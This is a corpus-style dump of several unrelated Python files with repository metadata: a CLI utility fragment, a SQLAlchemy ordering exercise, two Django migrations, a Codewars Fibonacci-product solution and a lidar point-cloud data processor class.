params_dict[key] = py_eval(value)
return params_dict
def py_eval(data):
try:
value = literal_eval(data)
return value
except (SyntaxError, ValueError):
return data
def set_item(obj, item, key, value=None):
if item:
if value:
setattr(obj, key, value)
else:
setattr(obj, key, item)
def line2keylist(lines: list, keyname="key", valname="path"):
out = []
for line in lines:
i = line.find("=")
if i == -1:
raise ValueError(f'cannot find "=" in line ({keyname}={valname})')
key, value = line[:i].strip(), line[i + 1 :].strip()
if key is None:
raise ValueError(f"cannot find key in line ({keyname}={valname})")
value = path.expandvars(value)
out += [{keyname: key, valname: value}]
return out
def time_str(x):
try:
return x.strftime("%b %d %H:%M:%S")
except ValueError:
return ""
def dict_to_str(struct: dict):
if not struct:
return []
return ",".join([f"{k}={v}" for k, v in struct.items()])
def func_url_to_runtime(func_url):
try:
if func_url.startswith("db://"):
func_url = func_url[5:]
project_instance, name, tag, hash_key = parse_versioned_object_uri(func_url)
run_db = get_run_db(mlconf.dbpath)
runtime = run_db.get_function(name, project_instance, tag, hash_key)
else:
func_url = "function.yaml" if func_url == "." else func_url
runtime = import_function_to_dict(func_url, {})
except Exception as exc:
logger.error(f"function {func_url} not found, {exc}")
return None
if not runtime:
logger.error(f"function {func_url} not found or is null")
return None
return runtime
if __name__ == "__main__":
main()
| 32.247505 | 118 | 0.609464 |
31939d900a952ba60adb1c729242ffa07a270d25 | 678 | py | Python | 6 - introduction to databases in python/ordering by a Single Column.py | Baidaly/datacamp-samples | 09b3e253ec2c503df936298fedc3902413c987b0 | [
"MIT"
] | null | null | null | 6 - introduction to databases in python/ordering by a Single Column.py | Baidaly/datacamp-samples | 09b3e253ec2c503df936298fedc3902413c987b0 | [
"MIT"
] | null | null | null | 6 - introduction to databases in python/ordering by a Single Column.py | Baidaly/datacamp-samples | 09b3e253ec2c503df936298fedc3902413c987b0 | [
"MIT"
] | null | null | null | '''
To sort the result output by a field, we use the .order_by() method. By default, the .order_by() method sorts from lowest to highest on the supplied column. You just have to pass in the name of the column you want sorted to .order_by(). In the video, for example, Jason used stmt.order_by(census.columns.state) to sort the result output by the state column.
'''
# Build a query to select the state column: stmt
stmt = select([census.columns.state])
# Order stmt by the state column
stmt = stmt.order_by(census.columns.state)
# Execute the query and store the results: results
results = connection.execute(stmt).fetchall()
# Print the first 10 results
print(results[:10])
| 45.2 | 357 | 0.755162 |
561c8a42e1dda3730f77dafbdca28887bd966ba4 | 473 | py | Python | guests/migrations/0007_auto_20160207_2119.py | dannymuchoki/django-wedding-website | 4cb322719b04500b587500ea65311f3db302732d | [
"Apache-2.0"
] | null | null | null | guests/migrations/0007_auto_20160207_2119.py | dannymuchoki/django-wedding-website | 4cb322719b04500b587500ea65311f3db302732d | [
"Apache-2.0"
] | null | null | null | guests/migrations/0007_auto_20160207_2119.py | dannymuchoki/django-wedding-website | 4cb322719b04500b587500ea65311f3db302732d | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-07 21:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('guests', '0006_auto_20160207_2116'),
]
operations = [
migrations.AlterField(
model_name='guest',
name='email',
field=models.TextField(blank=True, null=True),
),
]
| 22.52381 | 59 | 0.587738 |
71ba7241d5f75f45dc72521483f256eada1dc0be | 2,412 | py | Python | codewars/productFib.py | tarcisioallyson/python_exercise | be5257c5cce7c0c2b573ece2308e3b5b03c22fac | [
"Unlicense"
] | null | null | null | codewars/productFib.py | tarcisioallyson/python_exercise | be5257c5cce7c0c2b573ece2308e3b5b03c22fac | [
"Unlicense"
] | null | null | null | codewars/productFib.py | tarcisioallyson/python_exercise | be5257c5cce7c0c2b573ece2308e3b5b03c22fac | [
"Unlicense"
] | null | null | null | """ The Fibonacci numbers are the numbers in the following integer sequence (Fn):
0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, ...
such as
F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
Given a number, say prod (for product), we search two Fibonacci numbers F(n) and F(n+1) verifying
F(n) * F(n+1) = prod.
Your function productFib takes an integer (prod) and returns an array:
[F(n), F(n+1), true] or {F(n), F(n+1), 1} or (F(n), F(n+1), True)
depending on the language if F(n) * F(n+1) = prod.
If you don't find two consecutive F(m) verifying F(m) * F(m+1) = prodyou will return
[F(m), F(m+1), false] or {F(n), F(n+1), 0} or (F(n), F(n+1), False)
F(m) being the smallest one such as F(m) * F(m+1) > prod.
Some Examples of Return:
(depend on the language)
productFib(714) # should return (21, 34, true),
# since F(8) = 21, F(9) = 34 and 714 = 21 * 34
productFib(800) # should return (34, 55, false),
# since F(8) = 21, F(9) = 34, F(10) = 55 and 21 * 34 < 800 < 34 * 55
-----
productFib(714) # should return [21, 34, true],
productFib(800) # should return [34, 55, false],
-----
productFib(714) # should return {21, 34, 1},
productFib(800) # should return {34, 55, 0},
-----
productFib(714) # should return {21, 34, true},
productFib(800) # should return {34, 55, false}, """
def productFib(prod):
fibo_num = []
prod_fib = []
ctrl = 0
if prod < 5:
ctrl = 5
else:
ctrl = prod
i = 0
while i < ctrl:
#calculate fib numbers
if len(fibo_num) == 0:
fibo_num.append(i)
elif len(fibo_num) == 1:
fibo_num.append(i)
elif len(fibo_num) > 1:
fibo_num.append(fibo_num[i-1] + fibo_num[i-2])
#verify condition of product
if len(fibo_num) > 1:
if fibo_num[i-1] * fibo_num[i] == prod:
prod_fib.append(fibo_num[i-1])
prod_fib.append(fibo_num[i])
prod_fib.append(True)
break
elif fibo_num[i-2] * fibo_num[i-1] < prod < fibo_num[i-1] * fibo_num[i]:
prod_fib.append(fibo_num[i-1])
prod_fib.append(fibo_num[i])
prod_fib.append(False)
break
i+=1
return prod_fib
print(productFib(2)) | 31.324675 | 98 | 0.53068 |
15fa47396cd95eda37541b6461bda9e4e264e546 | 2,024 | py | Python | accounts/migrations/0001_initial.py | hpanwar08/greatkart | 834ff9fabdbb9493f54bcfd5d23505831b4a66d2 | [
"MIT"
] | null | null | null | accounts/migrations/0001_initial.py | hpanwar08/greatkart | 834ff9fabdbb9493f54bcfd5d23505831b4a66d2 | [
"MIT"
] | null | null | null | accounts/migrations/0001_initial.py | hpanwar08/greatkart | 834ff9fabdbb9493f54bcfd5d23505831b4a66d2 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-12-22 06:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('first_name', models.CharField(blank=True, max_length=50)),
('last_name', models.CharField(blank=True, max_length=50)),
('username', models.CharField(max_length=50, unique=True)),
('email', models.EmailField(max_length=100, unique=True)),
('phone_number', models.CharField(max_length=50)),
('last_login', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
('is_admin', models.BooleanField(default=False)),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('is_superuser', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 50.6 | 266 | 0.629447 |
98775b2b7bba19b7fb3191f4407f514b4ea33aa6 | 5,003 | py | Python | lidardet/datasets/processor/data_processor.py | Jiaolong/trajectory-prediction | 3fd4e6253b44dfdc86e7c08e93c002baf66f2e46 | [
"Apache-2.0"
] | 6 | 2021-05-10T09:42:01.000Z | 2022-01-04T08:03:42.000Z | lidardet/datasets/processor/data_processor.py | Jiaolong/trajectory-prediction | 3fd4e6253b44dfdc86e7c08e93c002baf66f2e46 | [
"Apache-2.0"
] | 3 | 2021-08-16T02:19:10.000Z | 2022-01-10T02:05:48.000Z | lidardet/datasets/processor/data_processor.py | Jiaolong/trajectory-prediction | 3fd4e6253b44dfdc86e7c08e93c002baf66f2e46 | [
"Apache-2.0"
] | 1 | 2021-07-15T00:51:58.000Z | 2021-07-15T00:51:58.000Z | from functools import partial
import numpy as np
#from ...utils import box_utils, geometry
#from ...utils.common import scan_downsample, scan_upsample, scan_to_range
class DataProcessor(object):
def __init__(self, processor_configs):
self.grid_size = self.voxel_size = None
self.data_processor_queue = []
for cur_cfg in processor_configs:
cur_processor = getattr(self, cur_cfg['name'])(config=cur_cfg)
self.data_processor_queue.append(cur_processor)
def remove_points_and_boxes_outside_range(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.remove_points_and_boxes_outside_range, config=config)
point_cloud_range = np.array(config['point_cloud_range'], dtype=np.float32)
mask = geometry.mask_points_by_range(data_dict['points'], point_cloud_range)
data_dict['points'] = data_dict['points'][mask]
if data_dict.get('gt_boxes', None) is not None and config['remove_outside_boxes']:
mask = box_utils.mask_boxes_outside_range_numpy(
data_dict['gt_boxes'], point_cloud_range, min_num_corners=config.get('min_num_corners', 1)
)
data_dict['gt_boxes'] = data_dict['gt_boxes'][mask]
return data_dict
def normalization(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.normalization, config=config)
img = data_dict['range_image_in']
for i in range(img.shape[0]):
img[i,...] = (img[i,...] - config['mean'][i]) / config['std'][i]
data_dict['range_image_in'] = img
return data_dict
def shuffle_points(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.shuffle_points, config=config)
points = data_dict['points']
shuffle_idx = np.random.permutation(points.shape[0])
points = points[shuffle_idx]
data_dict['points'] = points
return data_dict
def get_range_image(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.get_range_image, config=config)
points = data_dict['points']
range_image, _, _ = scan_to_range(points, normalize=True)
range_image = range_image[:,:,:2]
data_dict['range_image_even'] = range_image[::2, :, :].transpose((2, 0, 1))
data_dict['range_image_odd'] = range_image[1::2, :, :].transpose((2, 0, 1))
if 'points' in data_dict:
data_dict.pop('points')
if 'gt_boxes' in data_dict:
data_dict.pop('gt_boxes')
return data_dict
def scan_downsample(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.scan_downsample, config=config)
points = data_dict['points']
points_lr = scan_downsample(points)
data_dict['points'] = points_lr
return data_dict
def scan_upsample(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.scan_upsample, config=config)
points = data_dict['points']
points_dense = scan_upsample(points)
data_dict['points'] = points_dense
return data_dict
def voxelization(self, data_dict=None, config=None, voxel_generator=None):
if data_dict is None:
from spconv.utils import VoxelGenerator
point_cloud_range = np.array(config['point_cloud_range'], dtype=np.float32)
voxel_generator = VoxelGenerator(
voxel_size=config['voxel_size'],
point_cloud_range=point_cloud_range,
max_num_points=config['max_points_per_voxel'],
max_voxels=config['max_num_voxels'], full_mean=False
)
grid_size = (point_cloud_range[3:6] - point_cloud_range[0:3]) / np.array(config['voxel_size'])
self.grid_size = np.round(grid_size).astype(np.int64)
self.voxel_size = config['voxel_size']
return partial(self.voxelization, voxel_generator=voxel_generator)
points = data_dict['points']
voxels, coordinates, num_points = voxel_generator.generate(points)
data_dict['use_lead_xyz'] = True
#if not data_dict['use_lead_xyz']:
# voxels = voxels[..., 3:] # remove xyz in voxels(N, 3)
data_dict['voxels'] = voxels
data_dict['voxel_coords'] = coordinates
data_dict['voxel_num_points'] = num_points
return data_dict
def forward(self, data_dict):
"""
Args:
data_dict:
points: (N, 3 + C_in)
gt_boxes: optional, (N, 7 + C) [x, y, z, dx, dy, dz, heading, ...]
gt_names: optional, (N), string
...
Returns:
"""
for cur_processor in self.data_processor_queue:
data_dict = cur_processor(data_dict=data_dict)
return data_dict
| 40.674797 | 106 | 0.630022 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.